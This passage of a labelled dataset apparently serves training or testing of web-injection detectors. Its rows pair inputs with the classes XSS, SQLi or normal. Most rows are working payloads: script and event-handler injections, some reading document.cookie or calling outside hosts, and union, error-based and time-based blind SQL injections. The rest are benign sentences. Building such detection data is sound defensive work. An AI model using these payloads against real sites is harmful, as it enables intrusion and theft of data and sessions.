oncontextmenu=""alert(1)"">test</h1>",1,XSS,8382 1' where 8159 = 8159 union all select null#,2,SQLi,19219 "<section onkeypress=""alert(1)"" contenteditable>test</section>",1,XSS,3327 "<img oncopy=""alert(1)"" contenteditable>test</img>",1,XSS,5805 Select resume.,3,normal,24593 <script>alert`1`</script>,1,XSS,9698 Where did you hear about that new café from?,3,normal,23951 "<iframe onkeyup=""alert(1)"" contenteditable>test</iframe>",1,XSS,4318 "<html onkeydown=""alert(1)"" contenteditable>test</html>",1,XSS,4676 1 ) where 6494 = 6494,2,SQLi,21600 <button onError=javascript:alert(1)>,1,XSS,8971 "-5819%"" ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ""%"" = """,2,SQLi,10006 1' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,16972 "-3518 ) union all select 1877,1877,1877,1877#",2,SQLi,19044 "<dd onbeforepaste=""alert(1)"" contenteditable>test</dd>",1,XSS,4684 "1"" ) ) as tmpz where 7224 = 7224 and make_set ( 3579 = 1045,1045 ) --",2,SQLi,16296 <blockquote id=x tabindex=1 onactivate=alert(1)></blockquote>,1,XSS,3362 "{""id"":null,""name"":""Munna""}",3,normal,27417 Select a hairstyle for a new look.,3,normal,24239 <summary onpointerup=alert(1)>XSS</summary>,1,XSS,7205 "<style onkeyup=""alert(1)"" contenteditable>test</style>",1,XSS,4766 on,3,normal,23129 Select barter.,3,normal,24767 "1' in boolean mode ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) #",2,SQLi,11541 select sleep ( 5 ) and ( ( 'keoy' = 'keoy,2,SQLi,19360 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#",2,SQLi,16820 Select a style for the haircut.,3,normal,24260 "-1791' union all select 9316,9316,9316,9316,9316,9316,9316,9316--",2,SQLi,16680 "<div draggable=""true"" contenteditable>drag me</div><marquee ondragover=alert(1) contenteditable>drop here</marquee>",1,XSS,826 "1"" ) as tuem where 1328 = 1328",2,SQLi,20544 "{""id"":null,""name"":""Sandile""}",3,normal,27306 "1"" where 3368 = 3368 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12467 "1) or benchmark(10000000,MD5(1))#",2,SQLi,20179 "-5957 ) ) ) union all select 8485,8485,8485,8485,8485,8485,8485,8485,8485--",2,SQLi,15652 "<style>@keyframes x{}</style><code style=""animation-name:x"" onanimationstart=""alert(1)""></code>",1,XSS,1614 select * from users where id = '1' or \<$ or 1 = 1 -- 1',2,SQLi,17598 Select a hiking trail to hike.,3,normal,24236 1' union all select null--,2,SQLi,20992 Select receive.,3,normal,24702 "1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and 'tuzl' = 'tuzl",2,SQLi,11646 Select shut.,3,normal,24633 "<style>@keyframes x{}</style><figure style=""animation-name:x"" onanimationstart=""alert(1)""></figure>",1,XSS,1453 "<dl onbeforecopy=""alert(1)"" contenteditable>test</dl>",1,XSS,4878 &lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;,1,XSS,1515 "<plaintext draggable=""true"" ondragstart=""alert(1)"">test</plaintext>",1,XSS,2677 1'+ ( select 'mdxt' where 2733 = 2733 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,14871 "<BR SIZE=""&{alert('')}"">",1,XSS,9720 <isindex onpointerdown=alert(1)>XSS</isindex>,1,XSS,6611 "<div style=""x:expression((window.r==1)?'':eval('r=1;",1,XSS,5091 1 ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( 9505 = 9505,2,SQLi,16408 I think you can select the pieces that serve you well.,3,normal,26069 <ins onpointerdown=alert(1)>XSS</ins>,1,XSS,8716 Who Should select Senators?,3,normal,25131 ABC Carpet & Home: Up to 40% off select furniture.,3,normal,26420 "-4964"" ) ) union all select 4750,4750,4750,4750,4750--",2,SQLi,17964 <mark id=x tabindex=1 onbeforedeactivate=alert(1)></mark><input autofocus>,1,XSS,2258 "<div id=""126""><object id=""x"" classid=""clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598""></object>",1,XSS,1746 ORDER BY 6,2,SQLi,22421 "&lt;XSS STYLE=\""behavior&#58; url(xss&#46;htc);\""&gt;",1,XSS,4864 Select the Pen icon and the Master icon to alter the tempo along the tracks.,3,normal,25591 "<div draggable=""true"" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary>",1,XSS,813 "<div draggable=""true"" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select>",1,XSS,870 Where's the beach house?,3,normal,23559 Select dish.,3,normal,24538 <body onfocus=alert(1)>,1,XSS,9737 Select a class to enroll in.,3,normal,24139 "You can shop select featured deals, and take an extra 20% off select styles with the promo code ""BDAY20"" at checkout.",3,normal,25091 "1"" where 7279 = 7279 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,15899 <section id=x tabindex=1 onbeforeactivate=alert(1)></section>,1,XSS,3282 Select convey.,3,normal,24757 1'+ ( select 'wpnm' where 8223 = 8223 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ) +',2,SQLi,12165 1' ) ) as stnn where 6160 = 6160 and 8881 = 7347--,2,SQLi,18487 "<sub onmouseup=""alert(1)"">test</sub>",1,XSS,8788 1' ) as syer where 3141 = 3141 rlike ( select ( case when ( 6233 = 7567 ) then 1 else 0x28 end ) ) --,2,SQLi,14098 <q id=x tabindex=1 onactivate=alert(1)></q>,1,XSS,7143 <head onpointerup=alert(1)>XSS</head>,1,XSS,8599 select case when 1613 = 2937 then 1 else null end--,2,SQLi,18288 select ( case when ( 9103 = 9836 ) then 9103 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13630 Select a destination for the trip.,3,normal,24013 "1"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""tkkg"" = ""tkkg",2,SQLi,13721 Congratulations to our very own @JulienMid and @Value247 for being selected on Team @Yassuo for the upcoming League of Legends Twitch Rivals! . . . Will Value secure the three-peat? Will Julien pick up his first championship? Find out next week! . . .,3,normal,26512 select ( case when ( 4690 = 4373 ) then 4690 else 1/ ( select 0 ) end ) --,2,SQLi,15740 <rtc onblur=alert(1) tabindex=1 id=x></rtc><input autofocus>,1,XSS,3506 "<frame onbeforepaste=""alert(1)"" contenteditable>test</frame>",1,XSS,3526 "-1550' in boolean mode ) union all select 9777,9777,9777--",2,SQLi,17428 "<a onmousedown=""alert(1)"">test</a>",1,XSS,9213 "-4606"" ) as elek where 8261 = 8261 or 8571 = 8571--",2,SQLi,18359 "<html oncopy=""alert(1)"" contenteditable>test</html>",1,XSS,5422 "<figure onmouseleave=""alert(1)"">test</figure>",1,XSS,6727 1 ) where 7050 = 7050,2,SQLi,21698 "<a onmouseover=""alert(document.cookie)"">xxs link</a>",1,XSS,5081 Select motivate.,3,normal,24737 "<svg onLoad svg onLoad=""javascript:javascript:alert(1)""></svg onLoad>",1,XSS,2560 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ( 1105 = 1105",2,SQLi,13179 "{""id"":null,""firstName"":""William"",""lastName"":""Lambert"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27023 1'|| ( select 'vasx' where 4770 = 4770 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) ||',2,SQLi,10060 "select * from generate_series ( 2673,2673,case when ( 2673 = 1468 ) then 1 else 0 end ) limit 1--",2,SQLi,14325 "1'|| ( select 'drna' from dual where 5082 = 5082 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) ) ||'",2,SQLi,13835 "1' ) ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13534 "<style>@keyframes x{}</style><i style=""animation-name:x"" onanimationstart=""alert(1)""></i>",1,XSS,1775 "select * from users where id = 1 + ( \. ) union select null,@@VERSION -- 1",2,SQLi,15707 "{""id"":null,""firstName"":""Kwee Buay"",""lastName"":""Low"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26934 "1%"" ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,17809 "1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and 'vvkl' = 'vvkl",2,SQLi,12749 "<style>@keyframes x{}</style><blockquote style=""animation-name:x"" onanimationstart=""alert(1)""></blockquote>",1,XSS,1188 "1' in boolean mode ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,15801 """ ) ) ;waitfor delay '0:0:__TIME__'--",2,SQLi,19800 <nav onpointerleave=alert(1)>XSS</nav>,1,XSS,8523 1' ) and ( 3020 = 3020 ) *6703 and ( 'botl' like 'botl,2,SQLi,18029 "1%"" ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( ""%"" = """,2,SQLi,15052 "xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>",1,XSS,7322 Insert the clip.,3,normal,22874 "`""'><img src=xxx:x \x22onerror=javascript:alert(1)>",1,XSS,5296 "<xmp onbeforecopy=""alert(1)"" contenteditable>test</xmp>",1,XSS,4475 "1'+ ( select zukr where 9215 = 9215 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) ) +'",2,SQLi,11588 Where's the missing piece of jewelry?,3,normal,22657 Where did you find it?,3,normal,23482 -8684' where 9820 = 9820 or 6844 = 5105,2,SQLi,19610 "-3116 ) ) as jyiq where 3875 = 3875 union all select 3875,3875,3875,3875,3875,3875,3875,3875#",2,SQLi,14548 select session_user;,2,SQLi,21903 -7430' ) as xfah where 1596 = 1596 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9959 Select the game for which you wish to delete data.5.,3,normal,25600 "select * from users where id = 1 or "";&"" or 1 = 1 -- 1",2,SQLi,17935 Join tables where required.,3,normal,23285 "<a href=""\xE2\x80\x8Ajavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2018 "-5182"" ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11733 "1' ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16526 The role of Select midfield powerhouse is filled ably by Ally ' Bubble ' Mackay.,3,normal,25386 "{""id"":null,""name"":""stronger""}",3,normal,27067 "<IMG SRC=x onchange=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3607 "select * from users where id = '1' union select 1a,banner from v$version where rownum = 1 -- 1'",2,SQLi,14385 1 ) ) and ( 4169 = 9887 ) *9887 and ( ( 1137 = 1137,2,SQLi,18356 "<q onmouseup=""alert(1)"">test</q>",1,XSS,9455 "<canvas oncopy=""alert(1)"" contenteditable>test</canvas>",1,XSS,4606 "1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( 'cenk' = 'cenk",2,SQLi,11612 <multicol onpointerover=alert(1)>XSS</multicol>,1,XSS,6149 """))) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,19342 Where did you find that beautiful flower?,3,normal,22924 "1' ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 )",2,SQLi,13467 "{""id"":null,""name"":""Syakomon""}",3,normal,26957 hi' or 'x'='x';,2,SQLi,22155 <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>,1,XSS,133 "{""id"":null,""name"":""Zonkey""}",3,normal,27474 /><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />,1,XSS,4645 select * from users where id = 1 + ( \+ ) or 1 = 1 -- 1,2,SQLi,17747 Select your deal.,3,normal,24951 "1' where 2160 = 2160 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,12033 "javascript:/*""/*'/*\""/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script>",1,XSS,499 "-1272' or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11830 "-4923"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""afjc"" like ""afjc",2,SQLi,10552 "For a brief summary of the options to select in kernel configuration, visit the DiffServ project kernel configuration notes.",3,normal,26186 "<audio onpaste=""alert(1)"" contenteditable>test</audio>",1,XSS,4828 """ ) ) or pg_sleep ( __TIME__ ) --",2,SQLi,20190 "<progress onmouseout=""alert(1)"">test</progress>",1,XSS,6176 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",2,SQLi,13744 "The current group of artists will select the second cycle of exhibiting artists who will, in turn, select the final set of artists to join the exhibition.",3,normal,25466 "1' ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11347 "1' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'jmub' = 'jmub",2,SQLi,12564 "1%"" ) ) rlike sleep ( 5 ) #",2,SQLi,20878 "1%"" ) ) ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13455 "1' ) ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13426 -2823' ) ) or 5663 = 4228 and ( ( 'skgh' like 'skgh,2,SQLi,18339 "1 ) ) as nxdf where 1696 = 1696 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,14960 1'|| ( select 'mobv' from dual where 6338 = 6338,2,SQLi,18727 Filter the photos.,3,normal,22849 "1%"" ) ) rlike sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,19402 1' ) and sleep ( 5 ) and ( 'orxt' = 'orxt,2,SQLi,19385 Select an item from the list by checking the checkbox.,3,normal,25653 <details open ontoggle=confirm()>,1,XSS,9398 radians,3,normal,23225 "<s draggable=""true"" ondrag=""alert(1)"">test</s>",1,XSS,6326 1' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'jhlj' = 'jhlj,2,SQLi,10417 "1' ) ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( 'phdn' like 'phdn",2,SQLi,12471 "<div id=""137""><svg>",1,XSS,9774 "-4528"" ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ""fxmt"" like ""fxmt",2,SQLi,12614 1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'yaim' = 'yaim,2,SQLi,10276 "1%"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""%"" = """,2,SQLi,10645 "{""id"":null,""firstName"":""Chang"",""lastName"":""Yu"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26961 Sort the tangled wires.,3,normal,22671 Let's find out where the jazz concert is.,3,normal,23833 1 ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( 7805 = 7805,2,SQLi,15332 <BODY BACKGROUND=”javascript:alert(‘XSS’)”>,1,XSS,7076 <noembed onpointerup=alert(1)>XSS</noembed>,1,XSS,7176 1'+ ( select qsmo where 3172 = 3172,2,SQLi,20090 -9534%' or 3038 = 3038,2,SQLi,21384 "1"" where 1852 = 1852 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15046 -2223' ) ) as mjwp where 8650 = 8650 or 7900 = 5838,2,SQLi,18395 <legend onpointerout=alert(1)>XSS</legend>,1,XSS,7544 "<style>:target {color: red;}</style><picture id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></picture>",1,XSS,765 "-6667%"" ) ) union all select 7348,7348,7348,7348,7348,7348,7348,7348#",2,SQLi,16286 "<i onkeydown=""alert(1)"" contenteditable>test</i>",1,XSS,5926 "-4807' where 3232 = 3232 or make_set ( 6599 = 5179,5179 ) --",2,SQLi,17163 -1730' or 8571 = 8571--,2,SQLi,21316 "{""id"":null,""firstName"":""Jayden"",""lastName"":""Goh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27460 "<div id=""115""><!--[if]><script>alert(115)</script -->",1,XSS,5068 <header onpointerenter=alert(1)>XSS</header>,1,XSS,6843 "<a href=""j&#x61vascript:alert(1)"">XSS</a>",1,XSS,7597 "-4035' union all select 9540,9540,9540,9540,9540,9540,9540,9540,9540,9540--",2,SQLi,15669 "1' where 8430 = 8430 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12755 <applet onblur=alert(1) tabindex=1 id=x></applet><input autofocus>,1,XSS,2771 """ Then tap ""parental controls"" and select ""enable parental controls.",3,normal,26474 <colgroup id=x tabindex=1 ondeactivate=alert(1)></colgroup><input id=y autofocus>,1,XSS,1955 select ( case when ( 2768 = 8868 ) then 2768 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13611 1%' ) ) ) or sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,19284 "1%' ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( '%' = '",2,SQLi,11271 I'm thinking of where to take a photography class.,3,normal,23695 1 where 1519 = 1519,2,SQLi,21977 -1662 where 1119 = 1119 or ( 8459 = 8459 ) *4906--,2,SQLi,18496 "<wbr onmousemove=""alert(1)"">test</wbr>",1,XSS,8510 1' ) as pxcd where 9754 = 9754 or sleep ( 5 ) --,2,SQLi,18718 "<code onbeforecopy=""alert(1)"" contenteditable>test</code>",1,XSS,4122 1'+ ( select 'leok' where 4320 = 4320,2,SQLi,19816 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'mfib' = 'mfib",2,SQLi,14387 <svg onload=alert(1),1,XSS,9762 <th onpointerdown=alert(1)>XSS</th>,1,XSS,9089 "select * from generate_series ( 9058,9058,case when ( 9058 = 1183 ) then 1 else 0 end ) limit 1--",2,SQLi,14302 "1 ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( 3102 = 3102",2,SQLi,11599 "{""id"":null,""name"":""lips""}",3,normal,27506 "<rtc draggable=""true"" ondragend=""alert(1)"">test</rtc>",1,XSS,4910 "?onend=javascript:alert(1)//"",",1,XSS,9576 "<style>:target {transform: rotate(180deg);}</style><video id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></video>",1,XSS,607 "<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#",1,XSS,17 Select race.,3,normal,24714 "<acronym onmouseover=""alert(1)"">test</acronym>",1,XSS,6414 "Instead, they're looking to help out a select group of charities.",3,normal,25983 "1"" ) where 1330 = 1330 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --",2,SQLi,15315 javascript:confirm(1),1,XSS,9759 <data id=x tabindex=1 onactivate=alert(1)></data>,1,XSS,5768 "<colgroup onkeypress=""alert(1)"" contenteditable>test</colgroup>",1,XSS,3051 "<track ondblclick=""alert(1)"">test</track>",1,XSS,7731 <hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus>,1,XSS,3954 "-8566"" ) as hnch where 3418 = 3418 union all select 3418,3418,3418,3418,3418,3418,3418#",2,SQLi,14817 "<style>@keyframes slidein {}</style><noframes style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></noframes>",1,XSS,311 "1' and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13680 "HREF=""javascript:alert('')",1,XSS,9678 <svg><sub onload=alert(1)></sub>,1,XSS,9448 "<body onPageShow body onPageShow=""javascript:javascript:alert(1)""></body onPageShow>",1,XSS,1880 -5031' or 9323 = 9323#,2,SQLi,21489 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( 'dvpw' = 'dvpw",2,SQLi,16416 "1' ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'qgov' = 'qgov",2,SQLi,14252 "<style>:target {color: red;}</style><em id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></em>",1,XSS,1151 "-7764"" or 7308 = 7805",2,SQLi,21609 <shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus>,1,XSS,2519 "-1647' ) ) union all select 3030,3030,3030,3030,3030,3030,3030--",2,SQLi,16776 Select flight.,3,normal,24713 "{""id"":null,""name"":""major continued""}",3,normal,27602 "<picture><source srcset=""validimage.png""><image onloadend=alert(1)></picture>",1,XSS,2130 "<style>:target {transform: rotate(180deg);}</style><hr id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></hr>",1,XSS,704 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9",2,SQLi,18145 "</textarea>'""><script>alert(document.cookie)</script>",1,XSS,4868 "<source onkeypress=""alert(1)"" contenteditable>test</source>",1,XSS,3676 "<element onpaste=""alert(1)"" contenteditable>test</element>",1,XSS,3844 1 ) ) and sleep ( 5 ) #,2,SQLi,21288 Insert the SIM card tray.,3,normal,22703 "<style>:target {color:red;}</style><embed id=x style=""transition:color 1s"" ontransitionend=alert(1)></embed>",1,XSS,1113 "select sleep ( 5 ) and ( ""tlbp"" = ""tlbp",2,SQLi,19593 Let's discuss where to hold the family reunion.,3,normal,23979 1' ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( 'brhc' like 'brhc,2,SQLi,14751 <script>javascript:alert(1)</script\x0D,1,XSS,8093 "<style>:target {transform: rotate(180deg);}</style><code id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></code>",1,XSS,639 "<del onmouseover=""alert(1)"">test</del>",1,XSS,8443 "<a href=""javas\x08cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2408 "-3498"" ) ) as xbvb where 2056 = 2056 union all select 2056,2056,2056,2056,2056,2056,2056--",2,SQLi,14690 "{""id"":null,""firstName"":""Koh"",""lastName"":""Yun Jia"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27245 `'><script>\x2Bjavascript:alert(516)</script>,1,XSS,6749 </script><script>alert('');</script>,1,XSS,8891 al\u0065rt(1),1,XSS,9817 1'|| ( select 'ylio' from dual where 3767 = 3767 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) ) ||',2,SQLi,10102 1 ) as mixt where 1085 = 1085 or sleep ( 5 ) --,2,SQLi,18866 "-5243"" where 2105 = 2105 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,10005 <meter id=x tabindex=1 ondeactivate=alert(1)></meter><input id=y autofocus>,1,XSS,2230 Join the hiking expedition.,3,normal,22594 "-6746"" ) or ( 8459 = 8459 ) *4906 and ( ""kohi"" like ""kohi",2,SQLi,17489 Select the perfect dress for the occasion.,3,normal,24083 <svg onunload=window.open('javascript:alert(1)')>,1,XSS,5771 "<plaintext onmousemove=""alert(1)"">test</plaintext>",1,XSS,5614 Select a toy.,3,normal,24832 "<base oncopy=""alert(1)"" contenteditable>test</base>",1,XSS,5457 "<col oncontextmenu=""alert(1)"">test</col>",1,XSS,7882 <tfoot onpointerover=alert(1)>XSS</tfoot>,1,XSS,7689 "<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>",1,XSS,72 "1' ) where 4092 = 4092 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11249 <font onpointerleave=alert(1)>XSS</font>,1,XSS,7881 "<u onkeypress=""alert(1)"" contenteditable>test</u>",1,XSS,5770 "<div draggable=""true"" contenteditable>drag me</div><label ondrop=alert(1) contenteditable>drop here</label>",1,XSS,1180 1' ) rlike ( select ( case when ( 2721 = 8716 ) then 1 else 0x28 end ) ) and ( 'dumt' = 'dumt,2,SQLi,14549 "1 ) ) ) union all select null,null,null--",2,SQLi,19433 Select your dream destination city.,3,normal,24353 "1"" ) ) as hbfi where 4773 = 4773 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10107 "{""id"":null,""firstName"":""Wei"",""lastName"":""Chuan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27357 "<blink 